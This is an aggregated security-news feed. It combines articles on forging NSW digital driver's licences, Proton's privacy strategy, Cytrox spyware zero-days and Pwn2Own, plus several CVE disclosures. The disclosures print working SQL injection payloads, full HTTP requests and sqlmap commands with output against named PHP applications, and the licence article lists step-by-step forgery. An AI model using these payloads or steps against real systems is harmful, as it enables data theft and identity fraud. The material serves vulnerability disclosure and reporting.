Researchers found a litany of security flaws that allow simple, quick, and cheap forgeries in Australia.

In late 2019, the government of New South Wales in Australia rolled out digital driver’s licenses. The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud, compared to the plastic driver's license” citizens had used for decades.

Now, 30 months later, security researchers have shown that it’s trivial for just about anyone to forge fake identities using the digital driver's licenses, or DDLs. The technique allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. The process takes well under an hour, doesn’t require any special hardware or expensive software, and will generate fake IDs that pass inspection by the electronic verification system used by police and participating venues. All of this, despite assurances that security was a key priority for the newly created DDL system.

“To be clear, we do believe that if the Digital Driver's Licence was improved by implementing a more secure design, then the above statement made on behalf of ServiceNSW would indeed be true, and we would agree that the Digital Driver's Licence would provide additional levels of security against fraud compared to the plastic driver's licence,” Noah Farmer, the researcher who identified the flaws, wrote in a post published last week.

A Better Mousetrap Hacked With Minimal Effort

“When an unsuspecting victim scans the fraudster’s QR code, everything will check out, and the victim won't know that the fraudster has combined their own identification photo with someone’s stolen driver's licence details,” he continued. As things have stood for the past 30 months, however, DDLs make it “possible for malicious users to generate \[a\] fraudulent Digital Driver's Licence with minimal effort on both jailbroken and non-jailbroken devices without the need to modify or repackage the mobile application itself.”

DDLs require an iOS or Android app that displays each person’s credentials. The same app allows police and venues to verify that the credentials are authentic. Features designed to confirm the ID is authentic and current include:

*   Animated NSW Government logo.
*   Display of the last refreshed date and time.
*   A QR code expires and reloads.
*   A hologram that moves when the phone is tilted.
*   A watermark that matches the license photo.
*   Address details that don’t require scrolling.

Simple Technique

The technique for overcoming these safeguards is surprisingly simple. The key is the ability to brute-force the PIN that encrypts the data. Since it’s only four digits long, there are only 10,000 possible combinations. Using publicly available scripts and a commodity computer, someone can learn the correct combination in a matter of a few minutes, as demonstrated in this video showing the process on an iPhone.

Once a fraudster gets access to someone’s encrypted DDL license data—either with permission, by stealing a copy stored in an iPhone backup, or through remote compromise—the brute force gives them the ability to read and modify any of the data stored on the file.

From there, it's a matter of using simple brute-force software and standard smartphone and computer functions to extract the file storing the credential, decrypting it, changing the text, re-encrypting it, and copying it back to the device. The precise steps on an iPhone are:

*   Use iTunes backup to copy the contents of the iPhone storing the credential the fraudster wants to modify
*   Extract the encrypted file from the backup stored on the computer
*   Use brute-force software to decrypt the file
*   Open the file in a text editor and modify the birth date, address, or other data they want to fake
*   Re-encrypt the file
*   Copy the re-encrypted file to the backup folder and
*   Restore the backup to the iPhone

With that, the ServiceNSW app will display the fake ID and present it as genuine.

The following video shows the entire process from start to finish.

Death by 1,000 Flaws

A variety of design flaws make this simple hack possible.

The first is a lack of adequate encryption. A key based on a four-digit PIN is woefully inadequate. Apple provides a function named SecRandomCopyBytes for producing random bytes that can be used to generate secure keys. “If this was used to encrypt the Digital Driver's Licence rather than the 4 digit PIN, it would make the task of brute-forcing much harder if not completely infeasible for attackers,” Farmer wrote.

The next major flaw is that, astonishingly, DDL data is never validated against the back-end database to make sure that what’s stored on the iPhone matches records maintained by the government department. With no means to natively validate the data, there’s no way to tell when information has been tampered with. As a result, attackers are able to display the falsified data on the Service NSW application without any means to prevent or detect the fraud.

The third shortcoming is that using the “pull-to-refresh” function—a cornerstone of the DDL verification scheme intended to ensure the most current information is showing—fails to refresh any of the data stored in the electronic credential. Instead, it updates only the QR code. A better response would be for the pull-to-refresh function to download the latest copy of the DDL from the ServiceNSW database.

Fourth, the QR code transmits only the DDL holder’s name and status as either over or under the age of 18. The QR code is supposed to allow the person checking the ID to scan it with their own ServiceNSW app to validate that the data presented is authentic. To bypass the check, a fraudster only needs to obtain the driver's license details from a stolen or otherwise-obtained DDL and replace it locally on their phone.

“When an unsuspecting victim scans the fraudster’s QR code, everything will check out, and the victim won't know that the fraudster has combined their own identification photo with someone's stolen Driver's Licence details,” Farmer explained. Had the system returned the legitimate image data, the scanning party would easily see that the fraudster had forged the DDL, since the face returned by Service NSW wouldn’t match the face displayed on the app.

The last flaw the researcher identified was that the app allows the data it stores to be backed up and restored at all. While all files stored in the Documents and Library/Application Support/ folders are backed up by default, iOS allows developers to easily exclude certain files from backup by calling NSURL setResourceValue:forKey:error: with the NSURLIsExcludedFromBackupKey key.

With a reported 4 million NSW residents using the DDLs, the gaffe could have serious consequences for anyone who relies on DDLs to verify identities, ages, addresses, or other personal information. It's not clear how or even if Service NSW plans to respond. Given time differences between San Francisco and New South Wales, officials with the department weren't immediately available for comment.

Farmer noted this tweet, which called out a hotel bar for refusing service to someone who had only physical ID and instead accepting only DDLs. “I know 10 kids that you let in regularly with fake digital licenses because they are easy to make,” the person claimed.

While the veracity of that claim can’t be verified, it certainly sounds plausible, given the ease and effectiveness of the hack shown here.

_This story originally appeared on_ _Ars Technica__._

‘Tough to Forge’ Digital Driver’s Licenses Are—Yep—Easy to Forge

The encrypted-email company, popular with security-conscious users, has a plan to go mainstream.

Since its founding in 2014, ProtonMail has become synonymous with user-friendly encrypted email. Now the company is trying to be synonymous with a whole lot more. On Wednesday morning, it announced that it’s changing its name to, simply, Proton—a nod at its broader ambitions within the universe of online privacy. The company will now offer an “ecosystem” of linked products, all accessed via one paid subscription. Proton subscribers will have access not just to encrypted email, but also an encrypted calendar, file storage platform, and VPN.

This is all part of CEO Andy Yen’s master plan to give Proton something close to a fighting chance against tech giants like Google. A Taiwanese-born former particle physicist, Yen moved to Geneva, Switzerland, after grad school to work at CERN, the nuclear research facility. Geneva proved a natural place to pivot to a privacy-focused startup, thanks to both Switzerland’s privacy-friendly legal regime and to a steady crop of poachable physicists. Today, Yen presides over a company with more than 400 employees and nearly 70 million users. He recently spoke to WIRED about the enduring need for greater privacy, the dangers of Apple's and Google's dominance, and how today’s attacks on encryption recall the rhetorical tactics of the War on Terror.

This interview has been condensed and lightly edited.

**WIRED: You're in the online privacy business. To start super broadly, how do you define privacy?**

**Andy Yen**: These days, all Google and Apple and Big Tech talk about is privacy, so the best way to give our definition is to give the contrast. The way Google defines privacy is, “Nobody can exploit your data, except for us.” Our definition is cleaner, more simple, and more authentic: Nobody can exploit your data—period. We literally want to build things that give us access to as little data as possible. The use of end-to-end encryption and zero-access encryption allows that. Because fundamentally, we believe the best way to protect user data is to not have it in the first place.

**If you ask someone, “Would you like more privacy or less?” they always say more. But if you watch how people actually behave, for most people, data privacy is not a very high priority. Why do you think that is?**

Privacy is inherent to being human. We have curtains on the windows, we have locks on our doors. But we tend to disconnect the digital world from the physical world. So if you take the analogy of Google, it's someone that's following you around every single day, recording everything that you say and every place you visit. In real life, we would never tolerate that. On the internet, somehow, because it's not visible, we tend to think that it's not there. But the surveillance that you don't notice tends to be far more insidious than the one that you do.

**Your company has come out in support of reforms to strengthen antitrust enforcement. But a lot of people argue that privacy and competition are in conflict. Apple will say, “If you force us to allow more competition on the platform that we run, then that will reduce our control over the security and the privacy of the user. So if you make us increase competition, that will bring privacy down.” And then you see the flip side of the argument, which is when Apple or Google implements some new privacy feature that may hurt competitors. How do you think about these potential conflicts?**

What Apple is basically claiming is, you need to let us continue our use of app store practices because we're the only company in the world that can get privacy right. It’s an attempt to monopolize privacy, which I don’t think makes any sense.

If you look at the FTC lawsuit against Facebook, the theory is that privacy and competition are two sides of the same coin. If you're not happy with Facebook's privacy practices, what is the alternative social media that you can go to other than Facebook and Instagram? You don't really have that many options. We need more players out there. If they had to compete, then competition would force privacy to be a selling point.

The same is true for other services that we offer. Today, Google controls the Android operating system, which is used by the majority of people, and they can preload all their applications as a default on your user devices. So they have a massive advantage already because users don't change the defaults. So even though their privacy practices are quite terrible for most people, there's no real pressure to change it because the alternatives don't really exist. And if they do exist, Google's able to hide them, because they set the defaults on their devices. So if you want to fix the privacy issue, the best way to do it is to have more competition, because then there will be user choice, and users tend to choose what is more private, because, as you said, everybody wants more privacy.

**Europe’s new Digital Market Act has a controversial section requiring the biggest messaging platforms to let competitors interoperate with them, while still preserving end-to-end encryption. But quite a lot of people** **argue** **that you can't actually do both of those things. So here's a place where privacy and competition really do seem to be conflicting with each other technologically.**

I have to say, this has been around since the early '90s. PGP is basically interoperable encryption, based on the email standard. So it may not be technologically the easiest to do. But to say it’s technologically impossible is also not correct.

**Another EU proposal** **would require companies to implement methods of detecting child sex abuse material, or CSAM, on their platforms. People are very alarmed about the implications of that for encryption.**

We're still in the process of analyzing it, so I can’t comment specifically on the details of the proposal. But these proposals are not new. In fact, they've been coming up in various forms over the past decade. What is novel and different this time is that these proposals used to be packaged under “terrorism.” Now, they’re packaged under CSAM. It was very clever to repackage this idea into a topic that is even more toxic, which makes informed debate difficult. Obviously, CSAM is a horrible problem, something that the world is better without. But a wholesale attack on encryption can have unforeseeable consequences that are not always completely understood or considered by the drafters of these proposals.

**Do you think that this** _**is**_ **a wholesale attack on encryption, though? The people making these proposals say, “We're not attacking encryption. You just have to figure out a way to monitor for CSAM.”**

Well, there is really no practical way in today's technology to do that in a way that doesn't weaken encryption.

**The analogy to terrorism is interesting because, during the Bush-era War on Terror, there was a sense of literally anything being justified in the name of stopping terrorism. The US government was secretly spying on its own citizens. It was really hard to argue that we have to accept that some terrorism is going to happen. It's even harder to say, look, we've got to accept that some amount of child exploitation is going to happen and people are going to use digital tools to spread it. But at some point, I think you do have to defend the principle that we have to tolerate a certain amount of even the very worst things if we want to have meaningful civil liberties.**

If there was no privacy in the world, that world would be more “secure.” But that world does exist; it's called North Korea. And the people that live there probably don't feel very secure. As a democracy, you have to strike the right balance. The balance is not total mass surveillance of everybody, because we know that there are serious consequences to democracy and freedom as a result of that. It's not easy to find the right balance. But during the Bush years, with terrorism, I think they went to an extreme that really was a backsliding on democracy. And this is something that we need to avoid.

**But then on the flip side,** **you read stories** **about law enforcement catching really bad criminals, and in a lot of those stories, if that person had used a Tor browser and a ProtonMail account and a VPN, and so on, they might not have been caught. Do you ever worry about a future where all the bad guys get smart enough to use the best privacy tools, and it becomes too easy to evade the legal system entirely?**

Well, encryption and privacy technologies are what I would call dual-use. What is law enforcement also concerned about these days? People’s information being stolen, sensitive communications being hacked, emails of political campaigns being stolen by state actors and disseminated to shift the political balance. In order to prevent all of those potential ills, you need privacy, encryption, and good security. So, the same tools that people in law enforcement criticize are actually the same things that are shielding a lot of the internet ecosystem and the economy from a disastrous outcome. If you were to weaken or prohibit all of these security tools and privacy tools, then you would open the floodgate to a massive amount of cybercrime and data breaches.

**Proton has grown a lot over the years, but it’s still basically a rounding error compared to something like Google. We’ve talked about competition from a regulatory perspective, but on a practical level, how do you even try to compete with your massive rivals?**

The current plan is the launch of the Proton ecosystem. It's one account that gives you access to four privacy services: Proton Mail, Proton Calendar, Proton Drive, and Proton VPN. One subscription that gives you access to all those services. It's the first time anybody has taken a series of privacy services and combined them to form a consolidated ecosystem. That doesn't match all of Big Tech’s offerings, of course. But I think it provides, for the first time, a viable alternative that lets people say, “If I really want to get off of Google, I can now do it, because I have enough components to live a lot of my daily life.” For the first time, you’ll have a privacy option that’s not fully competitive with Google, but reasonably competitive, and that will start to break the dam. I don't know how it will go, but I think this is the future of privacy, and that’s why we're doing it.

**This is probably the first time I have ever thought about having an encrypted calendar.**

A calendar is essentially a record of your life: everybody you've met, everywhere you’ve been, everything that you have done. It's extremely sensitive. So you don't intuitively think about protecting that, but actually, it's essential.

**And by making that encrypted, who am I protecting that information from?**

Maybe it's the government requesting information on you. Maybe it's a data leak. Maybe it's a change in business model of your cloud provider at some point in the future that decides that they want to monetize user data in a different way. Your data is just one acquisition away from going across the border to a country that you didn't expect when you signed up for the service.

**Right. Elon Musk is about to own all my Twitter DMs.**

Exactly right. And with end-to-end encryption, no matter what happens, it's your data; you control it. It's just a mathematical guarantee.

**But what if I move all my stuff to the Proton ecosystem, and then like four years from now, you go out of business? What happens to my stuff?**

Proton has been around for eight years now. In the tech space, that's a long time. I think an indicator of what is sustainable in the long term is alignment between the business and the customers. Our business model is simple: Premium users pay us to keep theie data private, and our only incentive is to keep it private. Sometimes the easiest and simplest models are the ones that are the most durable. I strongly believe that Proton will be a company that outlives us.

Proton Is Trying to Become Google—Without Your Data

Badminton Center Management System 1.0 is vulnerable to SQL Injection via /bcms/classes/Master.php?f=delete_court_rental, id.

**badminton-center-management-system has SQL injection vulnerability **

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=delete\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=delete\_court\_rental, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=delete_court_rental HTTP/1.1
    Host: bcms.com
    Proxy-Connection: keep-alive
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://bcms.com
    Referer: http://bcms.com/bcms/admin/?page=court_rentals
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=4gth9auqof3f53e4gedjm3dct2
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30455: badminton-center-management-system/badminton-center-management-system.md at main · mikeccltt/badminton-center-management-system

A spyware vendor called Cytrox was found to be using several zero-day vulnerabilities in Google's Chrome browser and the Android kernel component. 
The post Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware appeared first on Malwarebytes Labs.

The Google Threat Analysis Group (TAG) has revealed that of the nine zero-day vulnerabilities affecting Chrome, Android, Apple and Microsoft that it reported in 2021, five were in use by a single commercial surveillance company.

Did I hear someone say Pegasus? An educated guess, but wrong in this case. The name of the surveillance company—or better said, professional spyware vendor—is Cytrox and the name of its spyware is Predator.

**Google**

TAG routinely hunts for zero-day vulnerabilities exploited in-the-wild to fix the vulnerabilities in Google’s own products. If the group finds zero-days outside of its own products, it reports them to the vendors that own the vulnerable software.

Patches for the five vulnerabilities TAG mentions in its blog are available. Four of them affected the Chrome browser and one the Android kernel component.

**Vulnerabilities**

By definition, zero-day vulnerabilities are vulnerabilities for which no patch exists, and therefore potentially have a high rate of success for an attacker. That doesn’t mean that patched vulnerabilities are useless to attackers, but they will have a smaller number of potential targets. Depending on the product and how easy it is to apply patches, vulnerabilities can be useful for quite a while.

In the campaign uncovered by TAG, the spyware vendor used the zero-days in conjunction with other already-patched vulnerabilities. The developers took advantage of the time difference between the availability of patches for some of the critical bugs, as it can take a while before these patches are fully deployed across the Android ecosystem.

TAG says Cytrox abused four Chrome zero-days (CVE-2021-37973, CVE-2021-37976, CVE-2021-38000, and CVE-2021-38003) and a single Android zero-day (CVE-2021-1048) last year in at least three campaigns conducted on behalf of various governments.

**Cytrox**

TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors. Cytrox is one of these vendors, along with the NSO Group—undoubtedly the best known one among them and responsible for Pegasus spyware.

Citizenlab at the University of Toronto published information about Cytrox in December 2021. It says that Cytrox describes its own activities as providing governments with an “operational cyber solution” that includes gathering information from devices and cloud services. It also says it assists with “designing, managing, and implementing cyber intelligence gathering in the network, enabling businesses to gather intelligence from both end devices as well as from cloud services.”

Cytrox reportedly began life as a North Macedonian start-up and appears to have a corporate presence in Israel and Hungary. As such, Cytrox is believed to be part of the so-called Intellexa alliance, a marketing label for a range of mercenary surveillance vendors that emerged in 2019. The consortium of companies includes Nexa Technologies (formerly Amesys), WiSpear/Passitora Ltd., Cytrox, and Senpai, along with other unnamed entities, purportedly seeking to compete against other players in the cyber surveillance market such as NSO Group (Pegasus) and Verint.

**Government spyware**

Spyware packages such as Predator and Pegasus create problematic circumstances for the security teams at Google, Apple, and Microsoft, and it seems like they will not stop any time soon.

Whatever arguments these vendors use about how they are working for governments, and therefore not doing anything illegal, we all know the legitimacy of some governments lies in the eye of the beholder. And it is not always easy to find out who actually controls the data received from the spyware.

It is for good reason that the European Data Protection Supervisor (EDPS) has urged the EU to ban the development and deployment of spyware with the capabilities of Pegasus to protect fundamental rights and freedoms. The EDPS argues that the use of Pegasus might lead to an unprecedented level of intrusiveness, threatening the very essence of the right to privacy, since the spyware is capable of interfering with the most intimate aspects of our daily lives.

Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware

A vulnerability classified as critical was found in Home Clean Services Management System 1.0. This vulnerability affects the file login.php. The manipulation of the argument email with the input admin%'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq leads to sql injection. The attack can be initiated remotely but it requires authentication. Exploit details have been disclosed to the public.

Permalink

**Home Clean Services Management System login.php email SQL injection****Exploit Title: Home Clean Services Management System login.php email SQL injection****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15293&title=Home+Clean+Service+System+in+PHP+Free+Source+Code****Version: Home Clean Services Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Home Clean Services Management System does not filter the content correctly at the "login.php" email module, resulting in the generation of SQL injection.

**Payload used:**

admin%'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin Password: admin
    
2.  Open Page http://172.24.5.102/HCS/public\_html/
    
3.  Put sleep(2) payload (asdasd@mail.com'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq) in the email content and click on Login to publish the page,Viewing the successfully sleep 2 seconds.  
    
4.  code
    

    Host: 172.24.5.102
    Pragma: no-cache
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    X-Proxyman-Repeated-ID: 235A6C1C
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3A9hTgZJbOpWAKqH
    Accept-Language: zh-CN,zh;q=0.9
    Accept-Encoding: gzip, deflate
    Cache-Control: max-age=0
    Origin: http://172.24.5.102
    Referer: http://172.24.5.102/HCS/public_html/index.php
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Upgrade-Insecure-Requests: 1
    Content-Length: 431
    Connection: close
    Cookie: PHPSESSID=fjbdak9heg1r2divhtlpubv986
    
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH
    Content-Disposition: form-data; name="email"
    
    asdasd@mail.com'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH
    Content-Disposition: form-data; name="password"
    
    1231312
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH
    Content-Disposition: form-data; name="login"
    
    
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH--

CVE-2022-1839: webray.com.cn/HCS_login_email_SQL_injection.md at main · Xor-Gerke/webray.com.cn

Inout Blockchain AltExchanger 1.2.1 allows index.php/home/about inoutio_language cookie SQL injection.

**Information**

    Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchanger
    Product             : Inout Blockchain AltExchanger
    version             : 1.2.1
    Date                : 2022-05-21
    Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
    Exploit Detail      : https://github.com/bigb0x/CVEs/Blockchain-AltExchanger-121-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**1- Vulnerable Parameter: symbol (GET)**

Vulnerability File: /application/third\_party/Chart/TradingView/chart\_content/master.php

  
**Sqlmap command:**

python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db  

**output:**

\` Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO
    

\[16:43:22\] \[INFO\] testing MySQL \[16:43:23\] \[INFO\] confirming MySQL \[16:43:26\] \[INFO\] the back-end DBMS is MySQL \[16:43:26\] \[INFO\] fetching banner \[16:43:26\] \[INFO\] resumed: 5.6.50 web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' \[16:43:26\] \[INFO\] fetching current database \[16:43:26\] \[INFO\] retrieved: inout\_blockchain\_altexchanger\_db current database: 'inout\_blockchain\_altexchanger\_db' \`  
  

**2- Vulnerable Parameter: marketcurrency (POST)**

Vulnerability File: /index.php/coins/update\_marketboxslider

  
**HTTP Request:**

**POST /index.php/coins/update_marketboxslider HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://vulnerable-host.com/ Cookie: inoutio_language=4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: vulnerable-host.com Connection: Keep-alive displaylimit=4&marketcurrency=-INJEQT-SQL-HERE**  
**3- Vulnerable Parameter: Cookie: inoutio\_language (GET)**

Vulnerability File: /index.php

  
**HTTP Request:**

**GET /index.php/home/about HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 x-requested-with: XMLHttpRequest Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: vulnerable-host.com Connection: Keep-alive**  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-21: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed@gmail.com

CVE-2022-31489: CVEs/Blockchain-AltExchanger-121-sqli.md at main · bigb0x/CVEs

Tesla, Microsoft, and others targeted in hacking competition that saw Star Labs crowned ‘Masters of Pwn’

Tesla, Microsoft, and others targeted in hacking competition that saw Star Labs crowned ‘Masters of Pwn’

  

Pwn2Own Vancouver closed its doors on Friday (May 20), with more than $1 million being awarded to celebrate 15 years of the annual hacking event.

Held by Trend Micro’s Zero Day Initiative (ZDI), the contest saw hackers from across the world compete both in person and virtually to find bugs in products from a wide range of vendors, including Microsoft, Mozilla, and Apple’s Safari browser.

Participants were offered the opportunity to earn both money and points, which would go towards being crowned ‘Master of Pwn’.

A team from Star Labs in Singapore, who were taking part virtually, were crowned this year’s champions with a total of 27 points.

Read more of the latest hacking news

Overall, prize payouts amounting to $1.2 million were awarded for the 27 vulnerabilities that were discovered during the event, which was celebrating its 15th year.

Sponsors including Tesla and VMWare also provided targets for the competition, with David Berard and Vincent Dehors from Synacktiv discovering two unique bugs leading to a sandbox escape on the Telsa Model 3 Infotainment System.

“The Synacktiv team was able to remotely take over the infotainment system, and they showed how they could stand outside the car and turn on the wipers, open the trunk, and flash the lights,” Dustin Childs, senior communications manager at Trend Micro’s ZDI, told The Daily Swig.

He added: “The attempt that failed still demonstrated some interesting research, and we were pleased to acquire through a standard program submission.”

DON’T MISS Pwn2Own Miami: Hackers earn $400,000 by cracking ICS platforms

Other notable discoveries include the zero-click exploit of two bugs, injection and arbitrary file write, on Microsoft Teams found by Daniel Lim Wee Soong, Poh Jia Hao, Li Jiantao, and Ngo Wei Lin of Star Labs, which earned the team $150,000, and an improper configuration against Microsoft Teams found by Hector “p3rr0” Peralta, also worth $150,000.

Childs said: “We’ve had an exciting event with more than $1,000,000 awarded to the contestants. With so many attempts in the category, we expected several bug collisions, but that hasn’t been the case. Almost everything demonstrated was unique and qualified for the maximum payout.

“It was interesting the see the variety of Microsoft Teams exploits demonstrated. We had three successful entries, and they were all different.

“The most interested – and most dangerous – was a zero-click entry that could be used to take over an entire organization. That’s one of the reasons we have this contest – to see the latest in exploit techniques and help get the patched before they are exploited in the wild.

“It’s been great to see the evolution of the program over the years. We’ve gone from a small, browser-focused event to awarded more than $1,000,000 two years in a row. We celebrated or 15th anniversary this year and can’t wait to see where the contest grows from here.”

Read about all of the entries and subsequent payouts via a blog post from ZDI.

YOU MAY ALSO LIKE Cybersecurity conferences 2022: A rundown of online, in person, and ‘hybrid’ events

Pwn2Own Vancouver: 15th annual hacking event pays out $1.2m for high-impact security bugs

This week on Lock and Code, we speak with Whitney Merrill about why it is so difficult to get your own data from a company. 
The post Hunting down your data with Whitney Merrill: Lock and Code S03E11 appeared first on Malwarebytes Labs.

Depending on where you live, you can ask a company to hand over all the data it has collected about you and, in a matter of weeks as mandated by law, that company has to fork that information over.

Whether the company will abide on time, however, is a different story.

In the European Union, the United Kingdom, and California, consumers have a leg up in understanding what data is collected about them, largely thanks to several laws passed in those regions in the last few years. And at least in California, people can request that a company hand over the data it has collected about them, even if they are not an active user of that company’s product or a customer of that company’s services.

That’s because in today’s world, your data is not collected only by the companies you directly interact with, but also by the companies that your friends and families interact with.

In February of last year, Whitney Merrill proved this was true when she requested her data from the then-popular app Clubhouse. Though Merrill did not have an account with the company and was not a user of the app, she proved that Clubhouse did have her phone number, which had been shared with Clubhouse by Merrill’s contacts who were active users.

Merrill, who has requested her data from several more companies since then, learned more about data privacy compliance than about just what is being collected about her. Each request, Merrill said, can be different from another, and each request is done separately, forcing users who want to learn more about how their data is collected to spend increasingly more of their own time—time which they may not realistically have. The entire model right now, Merrill said, has many flaws.

> “We all interact with thousands and thousands of websites and providers that collect our data—maybe hundreds is probably a better number—in any given week or year. And, as a result, you have to go to each individual one and ask for access to your data… The burden is really on the end user.”
> 
> Whitney Merrill, Data Protection Officer and Privacy Counsel at Asana

This week on the Lock and Code podcast with host David Ruiz, we speak with Merrill about the difficulties of requesting your own data from a company and why some companies seem to interpret data privacy laws as mere suggestions. We also touch on proposed solutions to today’s problems with cross-border data transfers and what “data localization” may lead to in the future.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “God God” by Wowa (unminus.com)

Hunting down your data with Whitney Merrill: Lock and Code S03E11

Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

# Information```Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct : Inout Blockchain AltExchangerversion : 1.2.1Date : 2022-05-21Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number : In ProgessExploit Author : Mohamed N. Ali @MohamedNab1l``` # Description Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure. ## 1- Vulnerable Parameter: symbol (GET) Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php ### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db` ### output:`Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] 